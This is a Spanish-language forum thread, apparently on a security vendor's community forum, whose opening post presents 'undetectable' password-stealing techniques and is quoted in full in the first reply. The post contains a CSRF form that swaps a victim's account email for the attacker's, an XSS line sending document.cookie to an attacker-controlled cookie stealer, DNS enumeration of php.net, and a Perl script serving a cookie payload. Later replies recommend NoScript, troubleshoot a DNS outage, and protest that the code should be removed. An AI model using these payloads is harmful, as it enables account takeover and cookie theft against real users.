Jump to content
davile

Ingenieria Social (Robar pass) (Indetectable)

Recommended Posts

Hola Buenas:

 

Cada ves hay mas medios de burlar a los navegadores y sus actualizaciones y a los antivirus !!

 

XSRF

 

 

Cross-Site Request Forgery, es una técnica mediante la cual, con un solo clic se puede robar credenciales o información sensible sobre los usuarios (contraseñas, etcs...), ejemplo:

 

Supongamos que tenemos una web victima la cual tiene mas o menos el siguiente funcionamiento, el usuario tiene su panel, en el cual puede cambiar su dirección de correo, el cual se usa para digamos recuperar la contraseña, pero dicho formulario no contiene captcha ni nada similar... bueno ahora supongamos que usa un navegador que permite JS, un atacante puede pasarle un archivo en otro server, el cual al estar logeado el usuario, haga el envió de la petición y cambie el correo de la victima por el del atacante, y seguido de ello, envié un mensaje de recuperación de contraseña, entonces tendremos la password de la victima en nuestro correo. Esto seria mas o menos así:

 

 

<form name="formulario" action="http://victima.com/perfil.php" Method=POST>
<input type='hidden' name='email' value="uxmal666@gmail.com">
<input type='hidden' name='submit' value="enviar">
<script>document.submit();</SCRIPT></form>

(aquí solo faltaría enviar el mensaje de recuperación de la password jeje)

 

Esta es mas o menos la esencia de esta clase de ataques, en si el usuario no notara que le están enviando un archivo que le robara su contraseña tan fácilmente, por que no aparece el intento de ataque en la barra de direcciones como comúnmente sucede con los XSS comunes. Tambien podemos usar un XSRF para mejorar un ataque XSS:

 

 

<form name="formulario" action="http://victima.com/login.php?user="><script>document.location = 'http://www.atacante.com/cookiestealer.php?cookie=' + document.cookie" Method=GET>
<script>document.submit();</SCRIPT></form>

 

Errores DNS, un poco de ingeniería social y XSRF en un solo ataque (XSS Mixto):

 

Bueno esta técnica se me ocurrió hace mucho, dudo ser el único que la emplea, pero esta es una forma bastante especial de atacar.

Atacando php.net (muestra del ataque, sin motivos de conflicto):

 

Buscamos un perfil sensible en el DNS, en este caso he detectado esto:

 

[-]Intentando Ataque AXFR....: Usando: remote1.easydns.com

No se Logro Obtener Zonas :(...Detectando Comodin en Registros A...

No Se Detecto Comodin :).

Probando DNS Brutes Forces:

www.php.net existe!

www2.php.net existe!

localhost.php.net existe!

mail.php.net existe!

mx.php.net existe!

news.php.net existe!

cl.php.net existe!

es.php.net existe!

docs.php.net existe!

doc.php.net existe!

 

Ahora resolvemos la IP:

 

Xianur0 ~ # nslookup localhost.php.net
Server:         10.0.116.129
Address:        10.0.116.129#53

Non-authoritative answer:
Name:   localhost.php.net
Address: 127.0.0.1

 

127.0.0.1 jejeje..

 

Ponemos al netcat a la escucha en el 80, y entramos a esa dirección:

 

Xianur0 ~ # nc -vvvlp 80
listening on [any] 80 ...
connect to [127.0.0.1] from Xianur0 [127.0.0.1] 34640
GET / HTTP/1.1
Host: localhost.php.net
User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

 

Ok, tenemos al navegador hacia la IP local...

Creamos el tester:

 

#!/usr/bin/perl
#Tester XSS Mixto By Xianur0 (<script>alert(document.cookie)</script>)

use Socket;
my $port = 80;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "Error: $!";
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr) or die "Error: $!";
listen(SERVER, SOMAXCONN) or die "Error: $!";
my $client_addr;
system("firefox http://localhost.php.net");
while ($client_addr = accept(CLIENT, SERVER))
{
print CLIENT "<script>alert(document.cookie)</script>";
close CLIENT;
}

 

y plop, nos abrirá el firefox con un alert() mostrando la cookie que tenemos en php.net (si es que tenemos).

 

podemos hacer un ejecutable (linux o windows) y los antivirus lo pasaran como si nada, por el simple hecho de que no hace conexiones externas, ya que usa como motor a los navegadores, pueden adaptar el código para que funcione con todos los navegadores y para que no solo lance un alert jejeje....

 

nota: la mayor parte de las webs de internet tienen configuraciones DNS similares a la que mostre arriba.

Edited by davile

Share this post


Link to post
Hola Buenas:

 

Cada ves hay mas medios de burlar a los navegadores y sus actualizaciones y a los antivirus !!

 

XSRF

 

Cross-Site Request Forgery, es una técnica mediante la cual, con un solo clic se puede robar credenciales o información sensible sobre los usuarios (contraseñas, etcs...), ejemplo:

 

Supongamos que tenemos una web victima la cual tiene mas o menos el siguiente funcionamiento, el usuario tiene su panel, en el cual puede cambiar su dirección de correo, el cual se usa para digamos recuperar la contraseña, pero dicho formulario no contiene captcha ni nada similar... bueno ahora supongamos que usa un navegador que permite JS, un atacante puede pasarle un archivo en otro server, el cual al estar logeado el usuario, haga el envió de la petición y cambie el correo de la victima por el del atacante, y seguido de ello, envié un mensaje de recuperación de contraseña, entonces tendremos la password de la victima en nuestro correo. Esto seria mas o menos así:

<form name="formulario" action="http://victima.com/perfil.php" Method=POST>
<input type='hidden' name='email' value="uxmal666@gmail.com">
<input type='hidden' name='submit' value="enviar">
<script>document.submit();</SCRIPT></form>

(aquí solo faltaría enviar el mensaje de recuperación de la password jeje)

 

Esta es mas o menos la esencia de esta clase de ataques, en si el usuario no notara que le están enviando un archivo que le robara su contraseña tan fácilmente, por que no aparece el intento de ataque en la barra de direcciones como comúnmente sucede con los XSS comunes. Tambien podemos usar un XSRF para mejorar un ataque XSS:

<form name="formulario" action="http://victima.com/login.php?user="><script>document.location = 'http://www.atacante.com/cookiestealer.php?cookie=' + document.cookie" Method=GET>
<script>document.submit();</SCRIPT></form>

 

Errores DNS, un poco de ingeniería social y XSRF en un solo ataque (XSS Mixto):

 

Bueno esta técnica se me ocurrió hace mucho, dudo ser el único que la emplea, pero esta es una forma bastante especial de atacar.

Atacando php.net (muestra del ataque, sin motivos de conflicto):

 

Buscamos un perfil sensible en el DNS, en este caso he detectado esto:

Ahora resolvemos la IP:

 

Xianur0 ~ # nslookup localhost.php.net
Server:         10.0.116.129
Address:        10.0.116.129#53

Non-authoritative answer:
Name:   localhost.php.net
Address: 127.0.0.1

 

127.0.0.1 jejeje..

 

Ponemos al netcat a la escucha en el 80, y entramos a esa dirección:

 

Xianur0 ~ # nc -vvvlp 80
listening on [any] 80 ...
connect to [127.0.0.1] from Xianur0 [127.0.0.1] 34640
GET / HTTP/1.1
Host: localhost.php.net
User-Agent: Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

 

Ok, tenemos al navegador hacia la IP local...

Creamos el tester:

 

#!/usr/bin/perl
#Tester XSS Mixto By Xianur0 (<script>alert(document.cookie)</script>)

use Socket;
my $port = 80;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "Error: $!";
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr) or die "Error: $!";
listen(SERVER, SOMAXCONN) or die "Error: $!";
my $client_addr;
system("firefox http://localhost.php.net");
while ($client_addr = accept(CLIENT, SERVER))
{
print CLIENT "<script>alert(document.cookie)</script>";
close CLIENT;
}

 

y plop, nos abrirá el firefox con un alert() mostrando la cookie que tenemos en php.net (si es que tenemos).

 

podemos hacer un ejecutable (linux o windows) y los antivirus lo pasaran como si nada, por el simple hecho de que no hace conexiones externas, ya que usa como motor a los navegadores, pueden adaptar el código para que funcione con todos los navegadores y para que no solo lance un alert jejeje....

 

nota: la mayor parte de las webs de internet tienen configuraciones DNS similares a la que mostre arriba.

 

Creo que navegando con FireFox y la extensión instalada NoScript (yo la uso) en principio te puedes proteger de este tipo de amenazas.

 

Saludos.

 

Share this post


Link to post

Que extensión es la NOscrip de fireflox no la conosco pasame algun link

 

Saludos ^_^

Share this post


Link to post
Que extensión es la NOscrip de fireflox no la conosco pasame algun link

 

Saludos ^_^

 

Es muy muy conocida y el FireFox con esta extensión te libra de muchos ataques 0-day y otros, prácticamente muchas de las vulnerabilidades que constantemente les sacan a FireFox, si tienes esta extensión estás protegido:

 

http://noscript.net/

 

y para instalarla: http://noscript.net/getit

 

Saludos.

 

Share this post


Link to post
Gracias la voy a Istalar

 

Saludos ^_^

 

Básicamente lo que hace es bloquear scripts y otros objetos inmersos en una página por defecto, alguna no te funcionará con esta extensión, pero tendrás que ir diciéndole en qué páginas confías y en qué dominio y así lo va recordando, de un mismo site puedes darle confianza a parte del dominio etc... la extensión te lo va mostrando y te avisa con un sonido, también puedes permitir permisos de ejecución temporalmente ...

 

Saludos.

Edited by harlan4096

Share this post


Link to post

Instalando yo también,

por los metodos que estoy viendo, los antivirus van muchos pasos por detras.

Share this post


Link to post
Instalando yo también,

por los metodos que estoy viendo, los antivirus van muchos pasos por detras.

Bueno... no siempre. Parece ser que ahora las webs de Firefox están inaccesibles.

¿Alguien puede confirmar este tema?

Share this post


Link to post
Bueno... no siempre. Parece ser que ahora las webs de Firefox están inaccesibles.

¿Alguien puede confirmar este tema?

 

Tengo acceso sin problemas a mozilla.com y .org ...

 

Saludos.

 

Share this post


Link to post
Tengo acceso sin problemas a mozilla.com y .org ...

 

Saludos.

En mi caso, en toda mi red local, no tengo acceso a cualquier site de Mozila (.com .org...)

y en todos los navegadores (Firefox, Opera, IE, Safari). Sólo me ocurre HOY.

Quizás sea algún tema de DNS (Telefónica: 80.58.61.250 80.58.61.254). ¿Utilizas las mismas?

 

 

Share this post


Link to post
En mi caso, en toda mi red local, no tengo acceso a cualquier site de Mozila (.com .org...)

y en todos los navegadores (Firefox, Opera, IE, Safari). Sólo me ocurre HOY.

Quizás sea algún tema de DNS (Telefónica: 80.58.61.250 80.58.61.254). ¿Utilizas las mismas?

 

Yo uso en todos mis sistemas los DNS OpenDNS que entre otras cosas van bastante rápidos y encima te dan protección ante algunas amenazas:

 

www.opendns.com 208.67.222.222 / 208.67.220.200

 

Saludos.

Edited by harlan4096

Share this post


Link to post

Conectado sin Problemas a fireflox parece de la zona !!

 

Saludos ^^

Share this post


Link to post

No hay manera desde la red local. No es el KIS ya que en 2 pcs no está ni siquiera instalado.

Probaré en mi casa esta noche.

Gracias a todos.

Edited by Visconti12

Share this post


Link to post

Por la pinta tienes problemas con los DNS, prueba a cambiar de DNS, reinicia el equipo, el router.

 

Con Ono tuvimos varios usuarios problemas de DNS que afectaban a la pagina del foro de Kaspersky, el resto las veiamos bien, pero a la de kaspersky solo podiamos entrar a traves de un anonimizador, puede que sea un problema de tu proveedor. Prueba a utilizar un anonimizador y ver si te muestra la pagina.

 

Saludos

Share this post


Link to post
Por la pinta tienes problemas con los DNS, prueba a cambiar de DNS, reinicia el equipo, el router.

 

Con Ono tuvimos varios usuarios problemas de DNS que afectaban a la pagina del foro de Kaspersky, el resto las veiamos bien, pero a la de kaspersky solo podiamos entrar a traves de un anonimizador, puede que sea un problema de tu proveedor. Prueba a utilizar un anonimizador y ver si te muestra la pagina.

 

Saludos

Estoy en ello... ahora contactando con el proveedor, ya que otros del grupo tienen el mismo problema.

Vamos a esperar hasta mañana a ver si se trata de algún tipo de saturación temporal, ya que ocurre

solo con las webs de Firefox y sus accesorios.

Share this post


Link to post

 

Tambien instalé NoScript 1.7.4. Gracias amigos.

 

 

Estoy en ello... ahora contactando con el proveedor, ya que otros del grupo tienen el mismo problema.

Vamos a esperar hasta mañana a ver si se trata de algún tipo de saturación temporal, ya que ocurre

solo con las webs de Firefox y sus accesorios.

 

Share this post


Link to post

Buen texto (lo digo a pesar de ser mio xD), te agradecería mucho si pusieras la fuente de mi texto ;).. de antemano gracias por tu respuesta...

Share this post


Link to post

bueno la verdad me parece un aptitud muy lammer y lo peor es k editan el texto xddddddddddddddd

 

jajaja y eso k el k copio y pego es un Advanced Member :b_lol1:

 

coloken la fuente copiones y seria etico k pidais permiso al autor de hacer copy & paste :angry2:

Edited by Dancrack

Share this post


Link to post
bueno la verdad me parece un aptitud muy lammer y lo peor es k editan el texto xddddddddddddddd

 

jajaja y eso k el k copio y pego es un Advanced Member :b_lol1:

 

coloken la fuente copiones y seria etico k pidais permiso al autor de hacer copy & paste :angry2:

 

 

igual esta info debería ser eliminada por q solo trae gente como voz q intentara robar a alguien con esto. No me parece para nada honesto decir q copiar un código para hacer (fraudes - robos - delitos) sea pie para llamarse Advanced Member. Muchos no entendemos ese tipo de programación pero también muchos les fue de ayuda para hacer sus delitos.

 

PD: no creo q esa info este por hay no mas pa q la vengan a poner en un foro q teoricamente cuida la seguridad.

Share this post


Link to post

Cierto, esa info debería ser eliminada, porque en teoría no se permite postear enlaces a malware o directamente código malware o que pueda ser utilizado como tal.

 

Por otro lado el estatus de Advanced Member es otorgado por el foro automáticamente dependiendo del número de post que se escriben y no tiene ningún privilegio en el foro, los únicos que pueden cambiar un post o editarlo o eliminar son los moderadores. Es decir, ser un Advanced Member en este foro no significa nada, yo mismo soy un Gold Beta Tester por haber colaborado ayudando a encontrar fallos, bugs etc... en el desarrollo de la versión 8 en el foro beta de Inglés, pero lo único que me distingue de vosotros es que aparece mi nick en otro color y poco más :) no tengo ningún privilegio excepto que puedo editar mis post cuando quiera y que tengo más capacidad para subir capturas de pantallas para mostrar posibles fallos y enviar ficheros, mientras que los demás tienen un tiempo limitado para editar lo escrito y menos capacidad de memoria para subir capturas, enviar ficheros, etc...

 

Por cierto, el código ha sido enviado a los KLab a la espera de que nos digan ...

 

Saludos.

Edited by harlan4096

Share this post


Link to post

Creo que las normas de este foro hacen difícil este tipo de incorrecciones o fraudes.

Los Advanced Members no tienen otro beneficio que haber visto como se desarrolla

el día a día por haber posteado mas veces. Si no quieres que te roben nada, no lo

hagas público pero no acusemos sin saber!!

Share this post


Link to post

Supuestamente la fuente es de Xianur0 no lo sabia ami solo me la pasaron atraves del msn el code asi que Xianur0 gracias por el code !!

 

Saludos ^_^

Share this post


Link to post

Para la proxima habra que ver de donde sacas las cosas y evitarte problemas

 

Saludos

Share this post


Link to post
Estoy en ello... ahora contactando con el proveedor, ya que otros del grupo tienen el mismo problema.

Vamos a esperar hasta mañana a ver si se trata de algún tipo de saturación temporal, ya que ocurre

solo con las webs de Firefox y sus accesorios.

 

Asunto solucionado... por lo visto era Telefonica la que atraves de sus DNS hacia sombra a las webs de FF.

Share this post


Link to post
Guest
This topic is now closed to further replies.

×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.